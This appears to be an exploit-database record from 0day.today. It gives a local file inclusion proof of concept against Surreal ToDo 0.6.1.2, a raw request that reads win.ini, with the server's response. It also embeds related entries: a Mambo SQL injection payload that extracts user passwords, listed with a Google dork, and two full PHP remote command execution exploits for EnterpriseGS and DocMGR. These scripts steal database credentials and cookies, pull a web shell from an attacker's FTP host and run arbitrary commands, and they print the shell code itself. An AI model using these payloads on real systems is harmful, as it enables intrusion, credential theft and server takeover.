ID 1337DAY-ID-31603
Type zdt
Reporter Ihsan Sencan
Modified 2018-11-14T00:00:00
Description
Exploit for the PHP platform in the web applications category
# Exploit Title: Surreal ToDo 0.6.1.2 - Local File Inclusion
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://getsurreal.com/surrealtodo
# Software Link: https://netcologne.dl.sourceforge.net/project/surrealtodo/Surreal%20ToDo/surrealtodo_v0.6.1.2.zip
# Version: 0.6.1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?content=[FILE]
#
GET /[PATH]/index.php?content=../../../../Windows/win.ini HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 07 Nov 2018 23:58:36 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1885
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# 0day.today [2018-11-19] #
{"id": "1337DAY-ID-31603", "bulletinFamily": "exploit", "title": "Surreal ToDo 0.6.1.2 - Local File Inclusion Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2018-11-14T00:00:00", "modified": "2018-11-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/31603", "reporter": "Ihsan Sencan", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-11-19T19:12:00", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "469a28a102aa45d0b863d1a554a9ee8b"}, {"key": "modified", "hash": "9b8f1b8b431988936640ca43cc31c880"}, {"key": "published", "hash": "9b8f1b8b431988936640ca43cc31c880"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8f9da6443571f75195f401f82e60b810"}, {"key": "sourceData", "hash": "8340c05472fc34999bf0328d1c6eb411"}, {"key": "sourceHref", "hash": "54c0a18c31fd9d387c97936edfb949f2"}, {"key": "title", "hash": "13b645b0cb592288ca9a094a06c14ba9"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "a95c00a3f1b6f9e2d3bf5e2c20e1af961f285909e23fa12bdc62102a57298b89", "viewCount": 259, "enchantments": {"score": {"value": -1.3, "vector": "NONE", "modified": "2018-11-19T19:12:00"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-1885", "1337DAY-ID-253", "1337DAY-ID-251"]}], "modified": "2018-11-19T19:12:00"}, "vulnersScore": -1.3}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/31603", "sourceData": "# Exploit Title: Surreal ToDo 0.6.1.2 - Local File Inclusion\r\n# Exploit Author: Ihsan Sencan\r\n# Vendor Homepage: http://getsurreal.com/surrealtodo\r\n# Software Link: 
https://netcologne.dl.sourceforge.net/project/surrealtodo/Surreal%20ToDo/surrealtodo_v0.6.1.2.zip\r\n# Version: 0.6.1.2\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n \r\n# POC: \r\n# 1)\r\n# http://localhost/[PATH]/index.php?content=[FILE]\r\n# \r\nGET /[PATH]/index.php?content=../../../../Windows/win.ini HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Wed, 07 Nov 2018 23:58:36 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nContent-Length: 1885\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=UTF-8\n\n# 0day.today [2018-11-19] #"}
{"zdt": [{"lastseen": "2018-04-04T19:34:00", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-05-17T00:00:00", "published": "2007-05-17T00:00:00", "id": "1337DAY-ID-1885", "href": "https://0day.today/exploit/description/1885", "type": "zdt", "title": "Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability", "sourceData": "===============================================================\r\nMambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\n-------------------------------\r\n\r\nMambo com_yanc v1.4 beta (id) Blind Remote SQL Injection Vuln\r\n\r\n-------------------------------------------------------------\r\n\r\nExploit: index.php?option=com_yanc&Itemid=9999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*\r\n\r\nExample:http://www.tnrb.net/\r\n\r\n-------------------------------------------------------------\r\n\r\ngoogle dork: inurl:index.php?option=com_yanc\r\n\r\n\r\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/1885"}, {"lastseen": "2018-02-07T01:13:34", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2006-02-13T00:00:00", "published": "2006-02-13T00:00:00", "id": "1337DAY-ID-253", "href": "https://0day.today/exploit/description/253", "type": "zdt", "title": "EnterpriseGS <= 1.0 rc4 Remote Commands Execution Exploit", "sourceData": "=========================================================\r\nEnterpriseGS <= 1.0 rc4 Remote Commands Execution Exploit\r\n=========================================================\r\n\r\n\r\n\r\n\r\n\r\n<?php\r\n# ---egs_10rc4_php5_incl_xpl.php 17.57 13/02/2006 #\r\n# #\r\n# EGS Enterprise Groupware System <=1.0 rc4 remote commands execution exploit #\r\n# coded by rgod #\r\n# #\r\n# -> works 
against PHP5 #\r\n# usage: launch from Apache, fill in requested fields, then go! #\r\n# #\r\n# Sun-Tzu: \"Thus the energy developed by good fighting men is as the momentum #\r\n# of a round stone rolled down a mountain thousands of feet in height. So #\r\n# much on the subject of energy.\" #\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\", 2);\r\nob_implicit_flush (1);\r\n\r\necho'<html><head><title> ******** EGS <= 1.0 rc4 remote commands execution *****\r\n</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">\r\n<style type=\"text/css\"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:\r\n#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img\r\n{background-color: #FFFFFF !important} input {background-color: #303030\r\n!important} option { background-color: #303030 !important} textarea\r\n{background-color: #303030 !important} input {color: #1CB081 !important} option\r\n{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox\r\n{background-color: #303030 !important} select {font-weight: normal; color:\r\n#1CB081; background-color: #303030;} body {font-size: 8pt !important;\r\nbackground-color: #111111; body * {font-size: 8pt !important} h1 {font-size:\r\n0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em\r\n!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em\r\n!important} \th2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em\r\n!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:\r\nnormal !important} *{text-decoration: none !important} a:link,a:active,a:visited\r\n{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;\r\ncolor : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;\r\nfont-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;\r\nfont-weight:bold; font-style: 
italic;}--></style></head><body><p class=\"Stile6\">\r\n******** EGS <= 1.0 rc4 remote commands execution ***** </p><p class=\"Stile6\">a\r\nscript by rgod at <a href=\"http://retrogod.altervista.org\"target=\"_blank\">\r\nhttp://retrogod.altervista.org</a> </p> <table width=\"84%\"><tr><td width=\"43%\">\r\n<form name=\"form1\" method=\"post\" action=\"'.$_SERVER[PHP_SELF].'\"> <p><input\r\ntype=\"text\" name=\"host\"> <span class=\"Stile5\">* target (ex:www.sitename.com)\r\n</span></p> <p><input type=\"text\" name=\"path\"> <span class=\"Stile5\">* path (ex:\r\n/EGS/ or just / ) </span></p><p><input type=\"text\" name=\"cmd\"> <span\r\nclass=\"Stile5\"> * specify a command </span> </p> <p> <input type=\"text\"\r\nname=\"FTP_LOCATION\"><span class=\"Stile5\"> * specify an ftp resource (ex: ftp://u\r\nsername:[email\u00a0protected]/shell.php) </span> </p><p> <input type=\"text\"\r\nname=\"port\"><span class=\"Stile5\">specify a port other than 80 (default value)\r\n</span> </p><p><input type=\"text\" name=\"proxy\"><span class=\"Stile5\"> send exp\r\nloit through an HTTP proxy (ip:port) </span> </p> <p> <input type=\"submit\"\r\nname=\"Submit\" value=\"go!\"></p></form></td></tr></table></body></html>';\r\n\r\nfunction show($headeri)\r\n{\r\n$ii=0;\r\n$ji=0;\r\n$ki=0;\r\n$ci=0;\r\necho '<table border=\"0\"><tr>';\r\nwhile ($ii <= strlen($headeri)-1)\r\n{\r\n$datai=dechex(ord($headeri[$ii]));\r\nif ($ji==16) {\r\n $ji=0;\r\n $ci++;\r\n echo \"<td>&nbps;&nbps;</td>\";\r\n for ($li=0; $li<=15; $li++)\r\n { echo \"<td>\".htmlentities($headeri[$li+$ki]).\"</td>\";\r\n\t\t\t }\r\n $ki=$ki+16;\r\n echo \"</tr><tr>\";\r\n }\r\nif (strlen($datai)==1) {echo \"<td>0\".htmlentities($datai).\"</td>\";} else\r\n{echo \"<td>\".$datai.\"</td> \";}\r\n$ii++;\r\n$ji++;\r\n}\r\nfor ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)\r\n { echo \"<td>  </td>\";\r\n }\r\n\r\nfor ($li=$ci*16; $li<=strlen($headeri); $li++)\r\n { echo 
\"<td>\".htmlentities($headeri[$li]).\"</td>\";\r\n\t\t\t }\r\necho \"</tr></table>\";\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\n\r\nfunction sendpacket() //if you have sockets module loaded, 2x speed! if not,load\r\n\t\t //next function to send packets\r\n{\r\n global $proxy, $host, $port, $packet, $html, $proxy_regex;\r\n $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\r\n if ($socket < 0) {\r\n echo \"socket_create() failed: reason: \" . socket_strerror($socket) . \"<br>\";\r\n }\r\n\t else\r\n \t\t { $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {echo 'Not a valid prozy...';\r\n die;\r\n }\r\n echo \"OK.<br>\";\r\n echo \"Attempting to connect to \".$host.\" on port \".$port.\"...<br>\";\r\n if ($proxy=='')\r\n\t\t {\r\n\t\t $result = socket_connect($socket, $host, $port);\r\n\t\t }\r\n\t\t else\r\n\t\t {\r\n\r\n\t\t $parts =explode(':',$proxy);\r\n echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\r\n\t\t $result = socket_connect($socket, $parts[0],$parts[1]);\r\n\t\t }\r\n\t\t if ($result < 0) {\r\n echo \"socket_connect() failed.\\r\\nReason: (\".$result.\") \" . socket_strerror($result) . \"<br><br>\";\r\n }\r\n\t else\r\n\t\t {\r\n echo \"OK.<br><br>\";\r\n $html= '';\r\n socket_write($socket, $packet, strlen($packet));\r\n echo \"Reading response:<br>\";\r\n while ($out= socket_read($socket, 2048)) {$html.=$out;}\r\n echo nl2br(htmlentities($html));\r\n echo \"Closing socket...\";\r\n socket_close($socket);\r\n\r\n\t\t\t\t }\r\n }\r\n}\r\nfunction sendpacketii($packet)\r\n{\r\nglobal $proxy, $host, $port, $html, $proxy_regex;\r\nif ($proxy=='')\r\n {$ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) { echo 'No response from '.htmlentities($host);\r\n\t\t\tdie; }\r\n }\r\n else\r\n {\r\n\t $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {echo 'Not a valid prozy...';\r\n die;\r\n }\r\n\t $parts=explode(':',$proxy);\r\n\t echo 'Connecting to '.$parts[0].':'.$parts[1].' 
proxy...<br>';\r\n\t $ock=fsockopen($parts[0],$parts[1]);\r\n\t if (!$ock) { echo 'No response from proxy...';\r\n\t\t\tdie;\r\n\t\t }\r\n\t }\r\nfputs($ock,$packet);\r\nif ($proxy=='')\r\n {\r\n\r\n $html='';\r\n while (!feof($ock))\r\n {\r\n $html.=fgets($ock);\r\n }\r\n }\r\nelse\r\n {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))\r\n {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\nfclose($ock);\r\necho nl2br(htmlentities($html));\r\n}\r\n\r\n$host=$_POST[host];$path=$_POST[path];\r\n$port=$_POST[port];$FTP_LOCATION=$_POST[FTP_LOCATION];\r\n$cmd=urlencode($_POST[cmd]);$proxy=$_POST[proxy];\r\necho \"<span class=\\\"Stile5\\\">\";\r\n\r\nif (($host<>'') and ($path<>'') and ($cmd<>'') and ($FTP_LOCATION<>''))\r\n{\r\n $port=intval(trim($port));\r\n if ($port=='') {$port=80;}\r\n if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\n if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n $host=str_replace(\"\\r\",\"\",$host);$host=str_replace(\"\\n\",\"\",$host);\r\n $path=str_replace(\"\\r\",\"\",$path);$path=str_replace(\"\\n\",\"\",$path);\r\n\r\n # STEP 1 -> Call the Fiyspray 0.9.7 installation script...\r\n $packet =\"GET \".$p.\"modules/projects/sql/install-0.9.7.php?p=2 HTTP/1.1\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"User-Agent: Rumours-Agent\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n show($packet);\r\n sendpacketii($packet);\r\n\r\n $temp=explode(\"basedir\\\" value=\\\"\",$html);\r\n $temp2=explode(\"\\\"\",$temp[1]);\r\n $basedir=$temp2[0];\r\n echo \"basedir -> \".htmlentities($basedir).\"<BR>\";\r\n $temp=explode(\"dbhost\\\" value=\\\"\",$html);\r\n $temp2=explode(\"\\\"\",$temp[1]);\r\n $DB_HOST=$temp2[0];\r\n echo \"DB HOST -> \".htmlentities($DB_HOST).\"<BR>\";\r\n $temp=explode(\"dbname\\\" value=\\\"\",$html);\r\n $temp2=explode(\"\\\"\",$temp[1]);\r\n $DB_NAME=$temp2[0];\r\n echo \"DB NAME -> 
\".htmlentities($DB_NAME).\"<BR>\";\r\n $temp=explode(\"dbuser\\\" value=\\\"\",$html);\r\n $temp2=explode(\"\\\"\",$temp[1]);\r\n $DB_USER=$temp2[0];\r\n echo \"DB USER -> \".htmlentities($DB_USER).\"<BR>\";\r\n $temp=explode(\"dbpass\\\" value=\\\"\",$html);\r\n $temp2=explode(\"\\\"\",$temp[1]);\r\n $DB_PASS=$temp2[0];\r\n echo \"DB PASS -> \".strip_tags(htmlentities($DB_PASS)).\"<BR>\";\r\n $temp=explode(\"Set-Cookie: \",$html);\r\n $temp2=explode(\" \",$temp[1]);\r\n $COOKIE=$temp2[0];\r\n echo \"COOKIE -> \".htmlentities($COOKIE).\"<BR>\";\r\n\r\n # STEP 2 -> submit the ftp resource with shell code inside...\r\n $data =\"basedir=\".urlencode($basedir);\r\n $data.=\"&adodbpath=\".urlencode($FTP_LOCATION);\r\n $data.=\"&dbtype=pgsql\";\r\n $data.=\"&dbuser=\".urlencode($DB_USER);\r\n $data.=\"&dbname=\".urlencode($DB_NAME);\r\n $data.=\"&dbhost=\".urlencode($DB_HOST);\r\n $data.=\"&dbpass=\".urlencode($DB_PASS);\r\n $packet =\"POST \".$p.\"modules/projects/sql/install-0.9.7.php?p=3 HTTP/1.1\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"User-Agent: Science Traveller International 1X/1.0\\r\\n\";\r\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n $packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\r\n $packet.=\"Cookie: \".$COOKIE.\"\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n show($packet);\r\n sendpacketii($packet);\r\n\r\n # STEP 3 -> Launch commands...\r\n $packet =\"GET \".$p.\"modules/projects/sql/install-0.9.7.php?p=4&cmd=\".$cmd.\" HTTP/1.1\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"User Agent: Googlebot 1.0\\r\\n\";\r\n $packet.=\"Cookie: \".$COOKIE.\"\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n show($packet);\r\n sendpacketii($packet);\r\n if (eregi(\"HiMaster!\",$html)) {echo \"Exploit succeeded...\";}\r\n else {echo \"Exploit failed...\";}\r\n}\r\nelse\r\n{echo \"Note: inside shell.php you need this code: <br>\";\r\n echo 
nl2br(htmlentities(\"\r\n <?php\r\n ob_clean();echo\\\"HiMaster!\\\";ini_set(\\\"max_execution_time\\\",0);phpinfo();passthru(\\$HTTP_GET_VARS[cmd]);die;\r\n ?>\r\n \")).\"<br>\";\r\n echo \"Fill * required fields, optionally specify a proxy...\";}\r\n echo \"</span>\";\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/253"}, {"lastseen": "2018-04-12T21:48:11", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2006-02-11T00:00:00", "published": "2006-02-11T00:00:00", "id": "1337DAY-ID-251", "href": "https://0day.today/exploit/description/251", "type": "zdt", "title": "DocMGR <= 0.54.2 (file_exists) Remote Commands Execution Exploit", "sourceData": "================================================================\r\nDocMGR <= 0.54.2 (file_exists) Remote Commands Execution Exploit\r\n================================================================\r\n\r\n\r\n\r\n\r\n\r\n<?php\r\n# ---docmgr_0542_incl_xpl.php 0.30 12/02/2006 #\r\n# #\r\n# DocMGR <= 0.54.2 remote commands execution exploit #\r\n# coded by rgod #\r\n# #\r\n# -> works against PHP5, with short_open_tag = On and register_globals = On #\r\n# usage: launch from Apache, fill in requested fields, then go! 
#\r\n# #\r\n# Sun-Tzu: \"The quality of decision is like the well-timed swoop of a falcon #\r\n# which enables it to strike and destroy its victim.\" #\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",0);\r\nob_implicit_flush (1);\r\n\r\necho'<html><head><title> ** DocMGR <= 0.54.2 remote commands execution exploit**\r\n</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">\r\n<style type=\"text/css\"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:\r\n#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img\r\n{background-color: #FFFFFF !important} input {background-color: #303030\r\n!important} option { background-color: #303030 !important} textarea\r\n{background-color: #303030 !important} input {color: #1CB081 !important} option\r\n{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox\r\n{background-color: #303030 !important} select {font-weight: normal; color:\r\n#1CB081; background-color: #303030;} body {font-size: 8pt !important;\r\nbackground-color: #111111; body * {font-size: 8pt !important} h1 {font-size:\r\n0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em\r\n!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em\r\n!important} \th2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em\r\n!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:\r\nnormal !important} *{text-decoration: none !important} a:link,a:active,a:visited\r\n{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;\r\ncolor : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;\r\nfont-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;\r\nfont-weight:bold; font-style: italic;}--></style></head><body><p class=\"Stile6\">\r\n** DocMGR <= 0.54.2 remote commands execution exploit** </p><p class=\"Stile6\">a\r\nscript 
by rgod at <a href=\"http://retrogod.altervista.org\"target=\"_blank\">\r\nhttp://retrogod.altervista.org</a> </p> <table width=\"84%\"><tr><td width=\"43%\">\r\n<form name=\"form1\" method=\"post\" action=\"'.$_SERVER[PHP_SELF].'\"> <p><input\r\ntype=\"text\" name=\"host\"> <span class=\"Stile5\">* target (ex:www.sitename.com)\r\n</span></p> <p><input type=\"text\" name=\"path\"> <span class=\"Stile5\">* path (ex:\r\n/DocMgr/ or just / ) </span></p><p><input type=\"text\" name=\"cmd\"> <span\r\nclass=\"Stile5\"> * specify a command </span> </p> <p> <input type=\"text\"\r\nname=\"FTP_LOCATION\"><span class=\"Stile5\"> * specify an ftp location (ex: ftp://u\r\nsername:[email\u00a0protected])</span> </p> <p> <input type=\"text\" name=\"port\">\r\n<span class=\"Stile5\">specify a port other than 80 (default value)</span> </p>\r\n<p><input type=\"text\" name=\"proxy\"><span class=\"Stile5\"> send exploit through\r\nan HTTP proxy (ip:port) </span> </p> <p> <input type=\"submit\" name=\"Submit\"\r\nvalue=\"go!\"></p></form></td></tr></table></body></html>';\r\n\r\nfunction show($headeri)\r\n{\r\n $ii=0;$ji=0;$ki=0;$ci=0;\r\n echo '<table border=\"0\"><tr>';\r\n while ($ii <= strlen($headeri)-1){\r\n $datai=dechex(ord($headeri[$ii]));\r\n if ($ji==16) {\r\n $ji=0;\r\n $ci++;\r\n echo \"<td>&nbps;&nbps;</td>\";\r\n for ($li=0; $li<=15; $li++) {\r\n echo \"<td>\".htmlentities_($headeri[$li+$ki]).\"</td>\";\r\n\t\t}\r\n $ki=$ki+16;\r\n echo \"</tr><tr>\";\r\n }\r\n if (strlen($datai)==1) {\r\n echo \"<td>0\".htmlentities($datai).\"</td>\";\r\n }\r\n else {\r\n echo \"<td>\".htmlentities($datai).\"</td> \";\r\n }\r\n $ii++;$ji++;\r\n }\r\n for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {\r\n echo \"<td>  </td>\";\r\n }\r\n for ($li=$ci*16; $li<=strlen($headeri); $li++) {\r\n echo \"<td>\".htmlentities($headeri[$li]).\"</td>\";\r\n }\r\n echo \"</tr></table>\";\r\n}\r\n\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\n\r\nfunction 
sendpacket() //2x speed\r\n{\r\n global $proxy, $host, $port, $packet, $html, $proxy_regex;\r\n $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\r\n if ($socket < 0) {\r\n echo \"socket_create() failed: reason: \" . socket_strerror($socket) . \"<br>\";\r\n }\r\n else {\r\n $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {echo 'Not a valid prozy...';\r\n die;\r\n }\r\n echo \"OK.<br>\";\r\n echo \"Attempting to connect to \".$host.\" on port \".$port.\"...<br>\";\r\n if ($proxy=='') {\r\n $result = socket_connect($socket, $host, $port);\r\n }\r\n else {\r\n $parts =explode(':',$proxy);\r\n echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\r\n $result = socket_connect($socket, $parts[0],$parts[1]);\r\n }\r\n if ($result < 0) {\r\n echo \"socket_connect() failed.\\r\\nReason: (\".$result.\") \" . socket_strerror($result) . \"<br><br>\";\r\n }\r\n else {\r\n echo \"OK.<br><br>\";\r\n $html= '';\r\n socket_write($socket, $packet, strlen($packet));\r\n echo \"Reading response:<br>\";\r\n while ($out= socket_read($socket, 2048)) {$html.=$out;}\r\n echo nl2br(htmlentities($html));\r\n echo \"Closing socket...\";\r\n socket_close($socket);\r\n }\r\n }\r\n}\r\n\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.htmlentities($host); die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid prozy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo 'Connecting to '.$parts[0].':'.$parts[1].' 
proxy...<br>';\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);echo nl2br(htmlentities($html));\r\n}\r\n\r\n$host=$_POST[host];$path=$_POST[path];\r\n$port=$_POST[port];$FTP_LOCATION=urlencode($_POST[FTP_LOCATION]);\r\n$cmd=urlencode($_POST[cmd]);$proxy=$_POST[proxy];\r\necho \"<span class=\\\"Stile5\\\">\";\r\n\r\nif (($host<>'') and ($path<>'') and ($cmd<>'') and ($FTP_LOCATION<>''))\r\n{\r\n $port=intval(trim($port));\r\n if ($port=='') {$port=80;}\r\n if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\n if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n $host=str_replace(\"\\r\",\"\",$host);$host=str_replace(\"\\n\",\"\",$host);\r\n $path=str_replace(\"\\r\",\"\",$path);$path=str_replace(\"\\n\",\"\",$path);\r\n\r\n # STEP X -> One and unique, arbitrary remote inclusion ...\r\n $packet=\"GET \".$p.\"modules/center/admin/accounts/process.php?cmd=$cmd&includeModule=suntzu\";\r\n $packet.=\"&siteModInfo[suntzu][module_path]=$FTP_LOCATION/ HTTP/1.1\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"User-Agent: MiracleAlphaTest\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n show($packet);\r\n sendpacketii($packet);\r\n if (eregi(\"HiMaster!\",$html)) {echo \"Exploit succeeded...\";}\r\n\t\t\t else {echo \"Exploit failed...\";}\r\n}\r\nelse\r\n{echo \"Note: on ftp://somehost.com you need this code<br>\r\n in process.php or function.php :<br>\";\r\n echo nl2br(htmlentities(\"\r\n <?php\r\n echo\\\"HiMaster!\\\";ini_set(\\\"max_execution_time\\\",0);passthru(\\$cmd);\r\n ?>\r\n \")).\"<br>\";\r\n echo \"Fill * required 
fields, optionally specify a proxy...\";}\r\necho \"</span>\";\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/251"}]}